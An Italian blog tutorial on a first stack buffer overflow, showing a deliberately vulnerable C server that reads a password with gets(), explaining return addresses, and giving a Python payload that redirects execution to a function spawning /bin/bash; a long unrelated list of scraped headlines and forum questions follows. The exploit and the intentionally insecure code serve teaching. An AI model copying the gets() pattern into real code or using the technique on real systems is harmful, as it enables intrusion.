Il tuo primo overflow del buffer

Nov 27 2022
Che tu sia uno studente, uno sviluppatore o un manager di un'azienda, dovresti provare questo. La chiave per scrivere codice sicuro è capire come si rompe il codice cattivo.

Che tu sia uno studente, uno sviluppatore o un manager di un'azienda, dovresti provare questo. La chiave per scrivere codice sicuro è capire come si rompe il codice cattivo. L'unico modo per decifrare il codice errato è sporcarsi le mani e iniziare a far scoppiare i proiettili nelle sfide di sfruttamento binario. In questo articolo, ti illustrerò come eseguire il tuo attacco di overflow del buffer utilizzando un esempio che ho fatto su YouTube.

In uno dei miei video su YouTube, ho spiegato come le stringhe nel linguaggio di programmazione C hanno fatto hackerare le persone. La ragione principale di ciò è che non esiste un attributo di lunghezza integrato associato al tipo di stringa C. L'unico modo per sapere se una stringa è completa è navigare fino alla fine della stringa.

https://youtu.be/fjMrDDj47E8

Questo concetto ha portato a innumerevoli vulnerabilità di overflow del buffer nel software e, di conseguenza, ha portato a migliaia di attacchi informatici e al furto di dati personali.

Il nostro server vulnerabile

Di seguito è riportato un codice per un semplice server in C.

#include <stdio.h>
#include <secrets.h>

void debug() 
{
    printf("!! ENTERING DEBUG MODE !!\n");
    system("/bin/bash");
}

int checkPassword()
{
    char password[64];

    printf("password: ");
    gets(password);

    return isValidPassword(password);
}

int main(int argc, char **argv)
{
    printf("WELCOME TO THE SECURE SERVER\n");

    if (checkPassword())
    {
        debug();
    } else {
        printf("Wrong password, sorry;\n");
    }
}

Tuttavia, c'è una grande vulnerabilità qui. La password che alla fine viene verificata viene letta dalla funzione gets , che è una funzione estremamente vulnerabile. Se non mi credi, controlla la pagina man per gets.

Never use gets(). Because it is impossible to tell without knowing the data 
in advance how many characters gets() will read, and because gets() will 
continue to store characters past the end of the buffer, it is extremely 
dangerous to use. It has been used to break computer security. Use fgets() 
instead.

La pila

La parte più difficile da capire per i programmatori e i professionisti della sicurezza informatica è come un sovraccarico di dati al di fuori di un buffer può portare un hacker a ottenere il controllo del tuo codice e, in definitiva, del tuo computer. Il modo in cui ciò accade è dovuto al modo in cui i computer organizzano la memoria quando un programma viene eseguito.

Figura 1: esempio di controllo del flusso del programma

Nell'esempio di codice precedente, il programma si avvia in main. Dopo l'avvio di main , sulla riga 10, viene chiamata other_function . Ciò che è estremamente importante da capire è come altra_funzione sappia andare alla riga 11 dopo che è tornata.

La struttura che contiene queste informazioni viene definita “lo stack”. Lo stack è la regione della RAM che viene utilizzata quando il programma viene eseguito e viene utilizzata per memorizzare sia le informazioni sul flusso di controllo (come gli indirizzi di ritorno), ma anche i dati.

Quando main chiama other_function , l'indirizzo che verrà eseguito next in main dopo il ritorno di other_function viene inserito in cima allo stack. other_function viene eseguito, quindi il programma torna all'indirizzo memorizzato da main .

È qui che gli overflow del buffer iniziano a essere importanti. Se c'è un overflow del buffer nei dati del tuo programma, puoi modificare le informazioni sul flusso di controllo e, infine, cambiare il modo in cui il programma viene eseguito.

Prova tu stesso

La stessa cosa vale per questo frammento di codice qui. L'idea alla base di questo programma è: se conosci la password, ottieni una shell. Sfortunatamente, noi hacker non conosciamo la password, quindi non riceviamo una shell. Tuttavia, poiché la funzione gets viene utilizzata, possiamo sfruttare la vulnerabilità di overflow del buffer e sovraccaricare l'indirizzo di ritorno. Invece di tornare a main , possiamo tornare direttamente alla funzione di debug senza conoscere la password.

Segui qui:

https://github.com/lowlevellearning/secure-server-stuff

Funzionalità di prova

Per iniziare, dovremmo eseguire il server e testarne la funzionalità. Inoltre, proviamo a indovinare la password.

Va bene, niente dadi. È qui che inizia l'hacking.

Arresta il server

Possiamo sfruttare l'overflow del buffer, come suggerisce il nome, eseguendo l'overflow del buffer. Per fare ciò, forniamo più dati di quanti il ​​server possa gestire.

In fondo, vediamo che il programma presentava un errore di segmentazione. Ciò significa che il programma ha tentato di accedere alla memoria a cui non era in grado di accedere. Se sei uno sviluppatore, questo è un male. Ma se stai cercando di hackerare il server, va bene :)

Analizziamo ulteriormente l'incidente.

Qui, possiamo vedere che il programma è andato in errore durante il tentativo di eseguire le istruzioni all'indirizzo 0x41414141. Quell'indirizzo doveva sembrare... strano. Abbastanza interessante, 0x41414141 è la rappresentazione esadecimale della stringa "AAAA", il che significa che la nostra stringa di As è andata in overflow nell'indirizzo di ritorno e la CPU ha cercato di eseguirla. ORA STIAMO HACKING!

Prendere il controllo

Per ottenere il controllo esatto dell'indirizzo di ritorno, dobbiamo determinare specificamente quale parte della nostra stringa ASCII ha causato il crash del programma. Possiamo farlo modulando la nostra stringa con caratteri diversi e utilizzando i caratteri per determinare dove inizia e finisce il nostro controllo dell'indirizzo di ritorno.

Invece di una lunga stringa di As, inseriamo 64 As, seguiti da una serie di caratteri ASCII extra. 64 è la lunghezza del nostro buffer di input, quindi è un buon punto di partenza per indovinare la lunghezza. Successivamente, inseriamo caratteri aggiuntivi. Per verificare dove inizia il nostro controllo, usa lo stesso comando di prima.

Ora puoi vedere che abbiamo un nuovo indirizzo di ritorno. 0x45454545 è la rappresentazione esadecimale di "EEEE"! Ciò significa che abbiamo determinato dove il nostro overflow prende il controllo del puntatore di ritorno. Da qui, dobbiamo inserire un indirizzo nel buffer che ci interessa davvero. Stiamo cercando di tornare alla funzione di debug, quindi dovremmo inserire quell'indirizzo al posto della stringa EEEE.

Per determinare l'indirizzo di debug, eseguiamo un semplice comando...

objdump -d -Mintel ./hacked | less

Sembra che l'indirizzo di debug sia 0x08049296. Se mettiamo l'indirizzo di debug dove si trovava la nostra stringa EEEE, forse possiamo controllare il programma e tornare al debug senza bisogno della password.

L'exploit finale

Possiamo farlo usando un po' di python-fu.

import sys

payload = b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
payload += b"BBBBCCCCDDDD"
payload += b"\x08\x04\x92\x96"[::-1]

sys.stdout.buffer.write(payload)


user@user:~/vuln$ (python3 exploit.py; cat) | ./hacked
WELCOME TO THE SECURE SERVER

password: !! ENTERING DEBUG MODE !!

cat password
too_kool_4_skoo

Seguimi su Medium, vai su Iscriviti su YouTube. E c'è dell'altro!

Strutture dati in JavaScript
Strutture dati in JavaScript
Che cos'è un elenco collegato, comunque? [Parte 1]
Che cos'è un elenco collegato, comunque? [Parte 1]
Quindi, parlami degli elenchi collegati
Quindi, parlami degli elenchi collegati
Quando tutto il resto fallisce, diventa creativo
Quando tutto il resto fallisce, diventa creativo
La mia astronave alla fine del mondo
La mia astronave alla fine del mondo
Lasagne di zucca e cavolo nero
Lasagne di zucca e cavolo nero
Senza paura di fallire, Walker Buehler riesce di nuovo con calma a NLCS Game 6
Senza paura di fallire, Walker Buehler riesce di nuovo con calma a NLCS Game 6
Bene con Kell: amico, pulisci il tuo intestino!
Bene con Kell: amico, pulisci il tuo intestino!
Il mio vicino di casa
Il mio vicino di casa
Brillante
Brillante
Creatività come bussola
Creatività come bussola
L'effetto della paura e del dolore sulla creatività
L'effetto della paura e del dolore sulla creatività
L'effetto della solitudine sulla creatività
L'effetto della solitudine sulla creatività
Ma cosa succede se non ho un posto dove tornare?
Ma cosa succede se non ho un posto dove tornare?
Il dolore invisibile
Il dolore invisibile
Finalmente ho smesso di fumare
Finalmente ho smesso di fumare
Non mi sento più in colpa per non essere produttivo
Non mi sento più in colpa per non essere produttivo
L'America è sempre stata una landa desolata e solitaria
L'America è sempre stata una landa desolata e solitaria
Una breve rassegna di due scene di "Borat 2"
Una breve rassegna di due scene di "Borat 2"
Il tuo bambino transgender ha bisogno di un terapista, e anche tu
Il tuo bambino transgender ha bisogno di un terapista, e anche tu
Lezioni di vita per gentile concessione di My Transgender Son
Lezioni di vita per gentile concessione di My Transgender Son
Mi rifiuto di lasciare che la preoccupazione abbia tutto il potere
Mi rifiuto di lasciare che la preoccupazione abbia tutto il potere
Maschere irritanti, moda e paure COVID-19
Maschere irritanti, moda e paure COVID-19
Samsung Galaxy Note 20 Ultra: telefono giusto, momento sbagliato
Samsung Galaxy Note 20 Ultra: telefono giusto, momento sbagliato
Petula Clark ha detto che "Downtown" ha rivelato una canzone disperata
MIA una volta ha attaccato "Give Peace a Chance" di John Lennon
Stevie Nicks si è "aggrappata" a una canzone di Joni Mitchell quando sentiva che la sua carriera musicale stava fallendo
Mick Jagger ha detto che "Their Satanic Majesties Request" dei Rolling Stones è stata ispirata dagli acidi, non dai Beatles
Perché Paul McCartney è stato "protetto" dal dire la verità sui Beatles
Prince ha lavorato su una canzone di Stevie Nicks per un'ora e ha guadagnato metà dei diritti d'autore 
Dolly Parton ha trovato Dio in una chiesa abbandonata Adolescenti locali usati per il sesso
Paul McCartney ha detto che un 'Sgt. La canzone di Pepper non parla di eroina
La canzone dei primi Beatles che è stata una delle "esibizioni più entusiasmanti" della band, secondo un membro dei Fab Four
"Non dormire nella metropolitana" sconcertava Petula Clark
David Bowie ha quasi scritto un musical composto da false canzoni di Bob Dylan
John Lennon ha detto 1 frase in "Revolution" dei Beatles commentata Police
Paul McCartney: La sofferenza ha reso buona 1 canzone dal "White Album" dei Beatles
Ringo Starr si rifiuta di suonare con una traccia di clic e questo lo rende un batterista migliore
La carriera di attore di Bradley Cooper era in pericolo quando ha lavorato con Julia Roberts in questo progetto
Gene Simmons afferma che i fumetti dei KISS potrebbero potenzialmente “ricreare l'umanità
I consigli di Jimmy Page per i giovani musicisti provengono direttamente dal manuale degli oratori motivazionali
Paul McCartney ha immaginato come sua madre avrebbe reagito al suo successo
Brad Pitt e Harrison Ford hanno dovuto inventare "The Devil's Own" al volo quando la "copione è stata buttata via"
Uno sguardo al ruolo di Buddy Ebsen in "The Andy Griffith Show"
Paul McCartney disse che "When I'm Sixty-Four" dei Beatles era uno scherzo
Paul McCartney ha condiviso ciò che lo ha colpito di più di John Lennon quando si sono incontrati per la prima volta
Paul McCartney era così stressato per l'unico spettacolo cancellato dei Beatles che ha vomitato
Taylor Sheridan ha appena aggiunto 1 delle sue star preferite di "Yellowstone" al cast di "Lawmen: Bass Reeves"
Dolly Parton ha aiutato sua nonna "invalida" quando nessuno degli altri nipoti l'avrebbe fatto: le faceva anche uno scherzo
George Harrison si è arrabbiato: i suoi testi per "Hurdy Gurdy Man" di Donovan non sono stati usati
Come è morto John Ritter: ripensando alla morte dell'attore di "Three's Company"
Christopher Nolan una volta si è pentito di aver letto la sceneggiatura di Pulp Fiction di Quentin Tarantino
Il manager dei Led Zeppelin, Peter Grant, ha visto una band finta vincere un Grammy prima che lo facessero gli Zep
'Boy Meets World': perché il signor Turner è scomparso dalla serie?
Come Melissa Gilbert ha salvato un uccellino intrappolandolo sotto la sua camicia da notte
Billy Crystal e Robin Williams hanno improvvisato il loro intero cameo di "Friends".
Quentin Tarantino una volta ha condiviso il personaggio più interessante che abbia mai scritto in "Pulp Fiction"
John Lennon ha condiviso perché "The Tonight Show" è stato lo spettacolo "più imbarazzante" in cui fosse mai stato
Rolling Stones: Keith Richards è stato incazzato da 1 gruppo di fan della musica che hanno criticato la band
Winona Ryder una volta ha condiviso che tutti i suoi personaggi sono stati scritti come la "ragazza brutta" all'inizio della sua carriera
Paul McCartney ha detto di essere stato "fortunato" a non aver mai usato eroina 
"Il curioso caso di Natalia Grace": dove sono oggi Nataila, Kristine e Michael Barnett?
Sam Heughan sa esattamente cosa prenderà dal set di 'Outlander': 'Mi sento come se fossi Jamie quando li indosso'
La canzone di Paul Simon che ha perfettamente parodiato Bob Dylan 
Judy Norton di "The Waltons" si è resa conto che a volte era "una mocciosa" durante le riprese dello spettacolo
Nicole Kidman ha adorato questo film interessante che Michael Keaton e Val Kilmer hanno condiviso nei panni di Batman
Come Paul McCartney ha reagito al titolo di "Lucy in the Sky with Diamonds" dei Beatles
La canzone dei Beatles che Peter Asher ha definito la "più grande canzone che abbia mai sentito"
Jana Duggar: tutto ciò che ha detto sull'amore e sulla sua finestra di 5 anni per trovare "l'unico"
Il momento migliore per visitare la location delle riprese di "La casa nella prateria".
Donovan ha paragonato una delle sue canzoni a "Lucy in the Sky with Diamonds" dei Beatles
"My Way" di Frank Sinatra non era così grande come il suo "Old MacDonald"
15 classici programmi TV degli anni '90 da guardare ininterrottamente questo fine settimana
Elon Musk possiede Twitter. Che cosa potrebbe andare storto?
I 10 migliori incantesimi per le spade in Minecraft
I 13 mostri più spaventosi dei film, della mitologia e altro ancora
Le 10 razze di cani più "spaventose": reputazione contro realtà
Dona i tuoi capelli per aiutare a mantenere la nostra acqua pulita
I 12 dinosauri più spaventosi che vorresti evitare mentre viaggi nel tempo
Pripyat: la città fantasma ucraina all'ombra di Chernobyl
Qual è lo sport più difficile del mondo?
Chief Plenty Coups: leader visionario e difensore della nazione dei corvi
13 Paesi socialisti molto diversi tra loro
10 stati con le leggi più severe sull'aborto dopo l'annullamento della sentenza Roe contro Wade
Come le meduse bioluminescenti ottengono il loro caratteristico bagliore
Meduse maculate bianche: carine finché non diventano invasive
Qual è la differenza tra i lieviti secchi istantanei e attivi?
9 stati con la più bassa imposta sulla proprietà (e solo 1 ingresso nel Pacifico)
Sinistra contro Liberale: differenze sfumate nelle filosofie politiche
Carta dei Tarocchi Quattro di Coppe: esplorandone il significato e l'interpretazione
Quanto è lontana la Russia dall'Alaska?
Pensiero oggettivo vs. soggettivo e applicazioni
La montagna più alta del sistema solare è molto più alta dell'Everest
Come la farfalla Glasswing svolazza (quasi) invisibilmente
Cos'è l'umidità e come influisce sulla temperatura?
9 castelli in Europa degni del loro status di icona
Come ripristinare le impostazioni di fabbrica del tuo iPhone
The Hardest Medical Schools to Get Into Accept <2% of Applicants
12 specie di rane colorate: dai disegni tie-dye alle tonalità rare
La mantide orchidea sembra un fiore, "punge" come un'ape
Qual è il pompelmo più dolce: bianco, rosso o rosa?
Where in the World Are You? Take our GeoGuesser Quiz
10 castelli in Scozia che devi assolutamente vedere nel tuo prossimo viaggio
Perché gli Stati Uniti non hanno sempre sostenuto la Corte penale internazionale
I 10 migliori pacchetti di texture di Minecraft per personalizzare il tuo gioco
9 tradizioni natalizie pagane che hanno ispirato le celebrazioni odierne
Le 10 migliori mod di Minecraft per dare nuova vita al tuo gioco
10 castelli in Inghilterra: dalle fortezze medievali alle dimore signorili
10 delle creature marine più spaventose che si nascondono nelle profondità dell'oceano
I calcoli renali sono strazianti, ma la fonte del dolore è sorprendente
Qual è il legno più duro del mondo?
10 stati con le aliquote fiscali più basse
Come si chiama un gruppo di corvi? Omicidio, massacro e altro ancora
20 cognomi antichi che gridano aristocrazia
Qual è la carta Pokémon più potente?
10 stati con i tassi di criminalità più alti
Quali sono le montagne russe più spaventose del mondo? 10 contendenti
15 Paesi socialisti democratici e socialdemocrazie
The Secrets of Airline Travel Quiz
10 specie di farfalle rosse trovate dall'India alla Florida all'Europa
Eddie Murphy sta coprendo tutto nel suo tour stampa di Beverly Hills Cop: Axel F
Biden ribatte alla sentenza della Corte Suprema sull'immunità di Trump e sottolinea il pericolo di un potere incontrollato
Ricordi quando una compagnia aerea olandese mise 440 scoiattoli in un trituratore gigante?
Alcuni fan di Mortal Kombat temono che l'ultimo gioco sia già morto, ma potrebbe essere più complicato
Beverly Hills Cop: recensione di Axel F: Eddie Murphy se la prende con calma nel semplice ritorno al passato di Netflix
Cate Blanchett spiega perché è nel film Borderlands
L'autista riesce a ribaltare il Cybertruck di Tesla, senza bisogno della guida autonoma
Land Rover Defender Octa è una bestia da 626 CV in arrivo per i Raptors of the World
Il destino di Young Thug nel processo YSL Rico richiederà più tempo del previsto
La Corte Suprema esaminerà le argomentazioni sulla possibilità che la legge del Texas possa determinare le tue abitudini pornografiche
Riuscirà Simone Biles a preparare SZA per le Olimpiadi?
Guarda Motorweek testare la sterlina, una versione britannica dimenticata della leggenda dell'Acura
L'isteria da lockdown alimentata dalla motosega di Cate Blanchett l'ha portata a Borderlands
Papa Francesco approva il primo santo millenario
Una spaventosa turbolenza fa volare un uomo nel cestino sospeso in un video virale
La Lionsgate si concede un anno di tempo per cambiare il titolo di Now You See Me 3 in Now You Three Me
Il mio Elden Ring: Evocazioni giocatore di Shadow Of The Erdtree, classificate
A $ 9.800, li metteresti dentro in questa Toyota RAV4 del 2008 a sette posti?
La moglie di Zelenskyj non ha effettivamente acquistato una Bugatti Tourbillon nonostante le affermazioni della propaganda russa
La Corte Suprema stabilisce che Trump ha l'immunità per qualsiasi crimine commesso tra i 9 e i 5 anni
Boeing vorrebbe che tutti smettessero di dire che il test sulla ISS dello Starliner è un fallimento
Sondaggio: i democratici seguono Trump se sostituiranno Biden con Biden, Biden o Biden
Un uomo della Louisiana ha inviato un avvertimento agghiacciante in vista dell'ondata di criminalità
Ecco perché Eddie Murphy è stato "costretto" a cambiare la sua famosa risata
Lo spettacolo Black Panther della Marvel sarà lo spettacolo animato più cruciale di sempre
Impedisci al tuo gatto di graffiare i mobili con queste strategie supportate dalla scienza
La nipote di Luther Vandross ha qualcosa da dire sulla sua straziante intervista post-ictus con Oprah Winfrey
Vuoi una Corvette ma vorresti che fosse orribile? Ragazzo, abbiamo preso la macchina per te
Ridley Scott "non era felice" quando furono distribuiti i sequel di Alien e Blade Runner
Il furgone delle consegne di Amazon prende fuoco in un'esplosione di fuoco durante la calura estiva di Houston
L'avventura di Tiana nel Bayou rompe 87 anni di una strana canonizzazione delle principesse Disney
AI per riesumare le voci di celebrità morte per leggerti PDF o altro
Il riepilogo di Bear: Marcus è l'uomo più gentile, tenero e sincero di Chicago?
Deadpool e Wolverine sbloccheranno finalmente i film degli X-Men della Marvel
Due bambini palestinesi sono "traumatizzati" dopo che una donna ha tentato di annegarli
Cattive notizie per Fani Willis e il suo caso di interferenza elettorale di Trump
Non va bene: l’uragano Beryl è la prima tempesta di categoria 5 nella storia
RIP Robert Towne, sceneggiatore premio Oscar di Chinatown
BMW non vuole che le auto bruciate nel bisarca vengano messe in vendita
Il direttore di Twister non ha ricevuto l'allarme tornado sui Twister
MaXXXine è una polposa storia hollywoodiana che sembra troppo docile
Una delle tante idee rifiutate da Ryan Reynolds per Deadpool 3 era un viaggio indie
Ho trascorso un fine settimana con la riproduzione remota e il cloud gaming ed è stato davvero fantastico
Xbox subisce un'interruzione grave [Aggiornamento: funziona di nuovo]
La McLaren non riesce a smettere di licenziare i piloti della IndyCar, anzi, lo adora
Il famoso rapper di YouTube e il famoso mago di TikTok entrano in una partita di abbaio virale
Chiedo ai giocatori di Final Fantasy 14 di leggere semplicemente il dialogo in Dawntrail
Nuovi bug open source lasciano migliaia di app iOS vulnerabili al dirottamento
Chi è il marito di Lisa Vanderpump? Tutto su Ken Todd
La famiglia di Yara Shahidi: tutto sui genitori e fratelli dell'attrice
Gwyneth Paltrow rivela l'abito da sera che ha tenuto dalla sua relazione con Brad Pitt 
Bob Barker, presentatore di lunga data di "The Price Is Right", morto a 99 anni: "Il più grande MC del mondo"
Donna trovata viva e "senza fiato" in un sacco per cadaveri all'impresa di pompe funebri dell'Iowa
Eric e Jessie James Decker si baciano sempre addosso e ai bambini non piace
Gli acquirenti concordano che questa spazzatrice per pavimenti Black + Decker è "molto più veloce" di una scopa tradizionale ed è in vendita
La tenuta di Kirstie Alley elenca la casa in Florida da 6 milioni di dollari della defunta star che ha acquistato da Lisa Marie Presley
Whoopi Goldberg mostra a Kit Harington la sua toilette ispirata a "Game of Thrones": "Un vero trono di ferro"
Margaret Josephs difende la scelta "devastante" di Melissa e Joe Gorga di saltare il matrimonio di Teresa Giudice
Chloe Cherry di "Euphoria" è accusata di furto per presunto furto di camicetta da $ 28
Tutto sulla relazione di Zoë Kravitz con i genitori Lenny Kravitz e Lisa Bonet
Chi è la ragazza di Dev Patel? Tutto su Tilda Cobham-Hervey
Dwayne Johnson afferma che sua madre sta "bene" dopo un incidente automobilistico notturno, "continuerà a essere valutata"
La figlia di Kevin Jonas, Alena, sembra cresciuta nella foto del compleanno: "9 anni non sembrano reali"
Donna morta 37 anni fa dopo essere stata trovata priva di sensi sull'autostrada Ga. Identificata come mamma scomparsa di 4 figli
Tom Girardi partecipa all'udienza per determinare la sua competenza a sostenere un processo per accuse di frode
Yasmin Vossoughian di MSNBC afferma che il medico ha liquidato i suoi dolori al petto come reflusso, quindi è iniziato il suo "incubo"
Charly Reynolds rivela un recente intervento chirurgico alle corde vocali: "Avevo problemi a cantare"
Le due figlie di David Hasselhoff: tutto su Taylor e Hayley
Ci sono oltre 2.500 stili per il freddo che si nascondono in questa sezione di vendita segreta su Nordstrom Rack - A partire da $ 6
La Marvel sta effettivamente pubblicando una memoria immaginaria di Scott Lang da "Ant-Man and the Wasp: Quantumania"
Matthew McConaughey rivela che un indovino gli ha detto di recitare in "Come perdere un ragazzo in 10 giorni"
TJ Watt vuole vedere Tom Brady e il fratello JJ entrare insieme nella Hall of Fame della NFL
L'olimpionica Jasmine Camacho-Quinn festeggia che suo fratello Robert Quinn è diretto al Super Bowl
Animal Rescue mette in guardia "Non tingere mai un uccello" dopo che il piccione rosa "lotta" è stato trovato a vagare per New York
Chi è la moglie di John Cleese? Tutto su Jennifer Wade
Cronologia della relazione tra Garth Brooks e Trisha Yearwood
Danielle Moné Truitt di 'Law & Order' pensa che i fan siano stati 'ingannati; Di Stabler e Benson Kiss Tease
La cantante di "Flashdance" Irene Cara è morta di ipertensione, colesterolo alto: rapporto
Anna Wintour lascia la carica di caporedattrice di Vogue dopo 37 anni e sta assumendo!
Professore della Purdue University arrestato per presunto spaccio di metanfetamine e proposta di favori sessuali a donne
Bengals Running Back Joe Mixon ricercato con mandato di arresto emesso per presunta arma da fuoco puntata contro una donna
Corpi ritenuti appartenere a rapper scomparsi da quando è stato trovato un concerto annullato: "Non se lo meritavano"
Il pattinaggio di figura statunitense "frustrato" per la mancanza di una decisione finale nell'evento a squadre, chiede una decisione equa
Molly Ringwald festeggia il 22° anniversario con il marito Panio Gianopoulos: "La migliore decisione che abbia mai preso"
Gli acquirenti di Amazon affermano di dormire "come un bambino coccolato" grazie a queste federe di seta che costano solo $ 10
Susan Lucci ricorda in lacrime il defunto marito mentre ammette di non essere ancora pronta per iniziare a frequentarsi
Chi è la moglie di Seth Meyers? Tutto su Alexi Ashe
Cronologia delle relazioni tra Suzanne Somers e Alan Hamel
La storia sentimentale di Ava Gardner: uno sguardo ai matrimoni e alle storie d'amore dell'icona di Hollywood
Jimmy Buffett, cantante di "Margaritaville", morto a 76 anni
Chelsea Houska di "Teen Mom" ​​condivide una reazione in lacrime al rinnovo della seconda stagione dello show di HGTV: "Significa così tanto"
Paul McCartney sull'essere "romantico" con la moglie Nancy Shevell: "Ho completamente esagerato a San Valentino"
Melissa Gorga non è sicura se risolverà la faida con Teresa Giudice: "Quanto tossico puoi lasciare che qualcosa diventi?"
Chi è la moglie di Vince Vaughn? Tutto su Kyla Weber
Muni Long dice che non ha ancora "processato" guadagnando 3 nomination ai Grammy: "Tutto sta andando così veloce"
Lizzo ha concesso il marchio per "100% QUELLA cagna" in caso di annullamento dopo che la domanda è stata respinta
Sto passando da femmina a maschio. Quale dovrebbe essere il mio nuovo nome?
Come posso ottenere la terapia ormonale sostitutiva senza dire che voglio la terapia ormonale sostitutiva?
Tutti attraversano la pubertà?
Qual è il modo migliore per passare naturalmente da maschio a femmina?
Quali sono i pro ei contro della pubertà?
È una buona idea iniziare la terapia ormonale sostitutiva a 18 anni (transgender)?
Ho 17 anni e ho intenzione di andare in terapia ormonale sostitutiva quando mi laureerò quest'anno a 18 anni. Fino ad allora cosa potevo fare per sentirmi più femminile?
Sono ancora transgender (FTM) se ho iniziato a mostrare segni solo quando ho raggiunto la pubertà?
Sono una studentessa universitaria di 21 anni. Cosa posso fare ora che cambierà la mia vita per sempre?
Se voglio scoprire per iniziare un trattamento per il cambio di genere, che tipo di medico devo visitare?
Oggi ho 19 anni. Qual è la cosa più importante che dovrei imparare?
Ho 23 anni. Cosa posso fare ora che cambierà la mia vita per sempre?
Come posso fermare la pubertà senza bloccanti della pubertà?
Sono un tredicenne depresso e voglio vedere un dottore per questo, ma ho paura di farlo e che i miei genitori lo spazzeranno via solo come i miei ormoni e cose del genere. Cosa dovrei fare?
Lo spironolattone è dannoso per la terapia ormonale sostitutiva?
Sono una ragazza di 14 anni che si annoia facilmente dei suoi hobby. Come trovo la mia passione e il mio talento?
Quali sono le abilità di vita necessarie che posso padroneggiare in questa estate di 3 mesi? Ho 17 anni.
Secondo te, qual è il passaggio di genere più difficile, da femmina a maschio (FtM) o da maschio a femmina (MtF)?
Come faccio a vivere la vita al meglio a 19 anni?
Ho 13 anni, transgender (ftm) e frequento un terapista da alcuni mesi. Come posso dirle che sono transgender e farle consigliare di fare coming out?
Ho 19 anni. Sto ancora attraversando la pubertà?
18 anni è una buona età per iniziare il passaggio a MTF?
Domani compio 16 anni. Che consiglio specifico puoi dare a un ragazzo di 16 anni?
Qual è l'età migliore per iniziare la transizione da femmina a maschio?
Compio 17 anni tra un mese e ho pensato che non mi sento molto diverso dall'avere 11 anni, è normale? Cambierò davvero quando invecchierò?
Transgender: Qual è stata la parte più difficile della tua transizione da maschio a femmina?
Qual è la cosa più utile che posso fare a 14 anni?
Durante il passaggio di genere da maschio a femmina, come ci si sente a crescere il seno?
Ho 17 anni, cosa devo fare per acquisire maggiori conoscenze?
Cosa dovrebbe succedere se non attraversi mai la pubertà?
La terapia ormonale sostitutiva è consigliata per gli adolescenti transgender?
Ho 19 anni e sono figlio unico. Mi deprimo e mi preoccupo per qualcosa che accade ai miei genitori perché sono tutto ciò che ho. Non ho amici e non ho potuto farne nessuno con la pandemia. Ho paura di essere solo, cosa posso fare per aiutare me stesso?
Puoi iniziare gli ormoni MTF HRT a 13 anni?
Qual è la cosa più importante che un adolescente di 14 anni dovrebbe tenere a mente?
Va bene che ho 13 anni ma sono ancora un ragazzino nel cuore?
Quali farmaci possono cambiare un maschio in una femmina senza intervento chirurgico?
Ho appena compiuto 17 anni, cosa faccio ora per garantirmi la vita migliore?
Vale la pena la chirurgia del fondo per una transizione da maschio a femmina?
Come inizio il mio passaggio da maschio a femmina? Sono sempre stata una ragazza dentro. Cosa devo fare?
Quali cambiamenti si verificheranno se vai in terapia ormonale sostitutiva alle 13?
Come faccio a prendere una visita dal medico senza i miei genitori e senza che loro sappiano il motivo per cui vado? Ho 15 anni.
Come posso cambiare la mia vita a 17 anni?
Ho 30 anni. Cosa posso fare ora che cambierà la mia vita per sempre?
A 13 anni, come posso risparmiare e immagazzinare denaro senza che i miei genitori lo sappiano?
La pubertà avviene per fasi? Può fermarsi e poi ricominciare?
Quali sono gli effetti negativi della pubertà (salute mentale, ecc.)?
Cosa può fare un quattordicenne per rendere la propria vita migliore/più facile?
Ho 16 anni e ne compio 17 il mese prossimo. Come faccio a rivolgermi a un terapeuta se mia madre pensa che non ne abbia bisogno?
Quanto dovrebbe essere grande un codice QR sul mio tetto perché un satellite sia in grado di scansionarlo data la risoluzione consentita oggi?
Quali sono i maggiori ostacoli per ottenere RL in produzione?
Se il decapaggio distrugge la vitamina C, in che modo i crauti sono ricchi di vitamina C?
La Corte Suprema può dichiarare incostituzionale un impeachment? [duplicare]
Come rimuovere gli anelli di Saturno?
Caso di studio: cosa serve per formulare e dimostrare l'argomento del piccolo oggetto di Quillen in ZFC?
" $\Sigma_1^1$-Peano aritmetica ”- lo definisce $\mathbb{N}$?
Principio di riflessione vs universi
La storia della moda dei lupi mannari, parte 1: gli anni 2000
"Non incorrono in sensi di colpa e muoiono"
Regex_search c++
Perché i voli non volano prima verso il loro percorso di atterraggio?
Cosa sono le bombe Ellerman e come possiamo identificarle?
Proxy nginx a Tomcat con SSL
Dimostra che una sequenza $\{a_n\}_n$definito da $a_1=-\frac14$e $-a_{n+1}=\frac{a_na_{n+1}+4}4$converge e trova il suo limite.
Chiedi il permesso a [prefisso] [infisso] [suffisso]. Cos'è [intero]?
Qual è la matrice del logaritmo dell'operatore derivato ( $\ln D$)? Qual è il ruolo di questo operatore in vari campi matematici?
Come si attaccano i cristalli a un bastone da sciamano senza usare adesivo?
winforms C # .NET - Come migliorare le prestazioni del mio codice durante l'utilizzo di cicli (for, foreach, ecc ...) [chiuso]
Possiamo generare elettricità dalle tempeste di sabbia marziane? In caso affermativo, può essere utilizzato per alimentare le colonie?
Come vedere se un array ha 2 o più elementi uguali? [duplicare]
La luna ha la velocità giusta per non schiantarsi sulla Terra o fuggire nello spazio. Quali sono le probabilità?
Kubernetes: è possibile combinare Pod.yaml e Service.yaml in un file yaml (ma senza distribuzione)
Puzzle scorrevole 3 x 2
Gruppo iniziale di leader di Mosè Esodo 18:21
"Quaranta giorni e quaranta notti"
Devo aprire la mia app se utilizzo dati API non modificati con licenza CC-BY-SA 4.0
Joomla Seleziona da DB AND / OR raggruppamento
Uso di una parola ebraica insolita per "splendeva" in Esodo
Il modo più pulito per utilizzare BeginTransaction utilizzando try catch
Rimuovi il bordo interno in tipo = colore
Perché la frutta e la verdura in salamoia non facevano parte delle razioni (europee) durante l'Età della Vela?
Qual è il modo corretto per chiudere un socket C# in .NET Core 3.1?
MOC: una domanda sull'utilizzo del marchio LEGO
Qual è la sentenza per dichiarare guerra nelle città?
Prova alpha di attivazione per un nuovo editor di stack
Un'analisi più approfondita dell'incidente di sicurezza di maggio 2019: feedback sul post del blog
java: ottieni il conteggio di tutte le chiavi e i valori distinti in Map <String, Set <String>> [duplicate]
Recupero del valore href di un campo Link dell'elemento Link in scriban [duplicato]
Si possono caratterizzare le anticatene massime in termini di reticoli distributivi?
Raggruppa l'elenco per elementi dell'elenco nidificato [duplicato]
Effetto Wilson: quanto sono "profonde" le macchie solari?
Per quanto riguarda un dottorando che rifiuta uno studente per problemi di salute
Come elencare i miei lavori k8s con un LabelSelector complesso da client-go?
Come ottenere un testo specifico che appartiene alla classe div
Esiste una doppia posizione di accoppiamento forzato?
